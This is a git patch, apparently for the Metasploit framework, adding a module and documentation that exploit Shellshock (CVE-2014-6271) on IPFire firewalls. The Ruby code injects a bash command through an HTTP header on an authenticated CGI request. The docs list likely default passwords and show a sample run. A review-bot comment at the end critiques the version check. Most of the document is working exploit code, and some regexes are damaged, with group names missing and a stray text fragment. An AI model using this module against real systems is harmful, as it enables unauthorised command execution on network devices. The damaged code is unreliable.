From df55f9a57c409d737ad0439e9cf3fc32cd9a328e Mon Sep 17 00:00:00 2001
From: h00die
Date: Sun, 29 May 2016 20:40:12 -0400
Subject: [PATCH] first add of ipfire shellshock
---
.../exploit/linux/http/ipfire_bashbug_exec.md | 47 ++++++++
.../linux/http/ipfire_bashbug_exec.rb | 113 ++++++++++++++++++
2 files changed, 160 insertions(+)
create mode 100644 documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md
create mode 100644 modules/exploits/linux/http/ipfire_bashbug_exec.rb
diff --git a/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md b/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md
new file mode 100644
index 0000000000..d0559b47be
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md
@@ -0,0 +1,47 @@
+The following is the recommended format for module documentation.
+But feel free to add more content/sections to this.
+
+
+## Vulnerable Application
+
+ Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso)
+ Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
+
+## Verification Steps
+
+ Example steps in this format:
+
+ 1. Install the firewall
+ 2. Start msfconsole
+ 3. Do: ```use exploit/linux/http/ipfire_bashbug_exec```
+ 4. Do: ```set rhost 10.10.10.10```
+ 5. Do: ```set CMD ls```
+ 6. Do: ```run```
+ 7. You should see the output of the command that was run.
+
+## Options
+
+ **PASSWORD**
+
+ Password is set at install. May be blank, 'admin', or 'ipfire'.
+
+ **CMD**
+
+ This is the command to run on the system.
+
+## Scenarios
+
+ Example of running the ID command
+ ```
+ msf > use exploit/linux/http/ipfire_bashbug_exec
+ msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
+ PASSWORD => admin
+ msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
+ rhost => 192.168.2.202
+ msf exploit(ipfire_bashbug_exec) > set CMD id
+ CMD => id
+ msf exploit(ipfire_bashbug_exec) > exploit
+
+ [+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
+ [*] Exploit completed, but no session was created.
+ ```
diff --git a/modules/exploits/linux/http/ipfire_bashbug_exec.rb b/modules/exploits/linux/http/ipfire_bashbug_exec.rb
new file mode 100644
index 0000000000..bd08955fcb
--- /dev/null
+++ b/modules/exploits/linux/http/ipfire_bashbug_exec.rb
@@ -0,0 +1,113 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)',
+ 'Description' => %q{
+ IPFire, a free linux based open source firewall distribution,
+ version <= 2.15 Update Core 82 contains an authenticated remote
+ command execution vulnerability via shellshock in the request headers.
+ },
+ 'Author' =>
+ [
+ 'h00die ', # module
+ 'Claudio Viviani' # discovery
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'https://www.exploit-db.com/exploits/34839/' ],
+ [ 'CVE', 'CVE-2014-6271']
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => %w{ linux unix },
+ 'Privileged' => false,
+ 'DefaultOptions' =>
+ {
+ 'SSL' => true,
+ 'PAYLOAD' => 'cmd/unix/generic'
+ },
+ 'Arch' => ARCH_CMD,
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic'
+ }
+ },
+ 'Targets' =>
+ [
+ [ 'Automatic Target', { }]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Sep 29 2014'
+ ))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+ OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+ Opt::RPORT(444)
+ ], self.class)
+ end
+
+ def check()
+ begin
+ res = send_request_cgi({
+ 'uri' => '/cgi-bin/index.cgi',
+ 'method' => 'GET',
+ 'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
+ })
+ fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+ fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
+ /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body
+
+ if version && update && version == "2.15" && update.to_i < 83
+ Exploit::CheckCode::Vulnerable
+ else
+ Exploit::CheckCode::Safe
+ end
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+ end
+
+ #
+ # CVE-2014-6271
+ #
+ def cve_2014_6271(cmd)
+ %{() { :;}; /bin/bash -c "#{cmd}" }
+ end
+
+ def exploit()
+ begin
+ payload = cve_2014_6271(datastore['CMD'])
+ vprint_status("Exploiting with payload: #{payload}" )
+ res = send_request_cgi({
+ 'uri' => '/cgi-bin/index.cgi',
+ 'method' => 'GET',
+ 'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
+ 'headers' => {'VULN' => payload}
+ })
+
+ fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+ fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
+ /
  • Device: \/dev\/(?.+) reports/m =~ res.body
+ if output
+ print_good(output)
+ end
+
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+ end
+end
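Review bot: In `check`, the final `else` returns `Exploit::CheckCode::Safe` both when the version banner is not found in `res.body` and when `version` is anything other than exactly "2.15", so an unrecognised page or an older release is reported as safe even though the module description states `version <= 2.15 Update Core 82` is affected. A false "safe" is the costlier error for anyone using the check to triage hosts; add `return Exploit::CheckCode::Unknown unless version && update` before the comparison and compare the version as an ordered value, e.g. `Gem::Version.new(version) < Gem::Version.new('2.15') || (version == '2.15' && update.to_i < 83)`. `check` also calls `fail_with` on a nil response, on a 401 and on `::Rex::ConnectionError`; returning `Exploit::CheckCode::Unknown` in those three places lets a failed probe yield a result instead of raising out of the check.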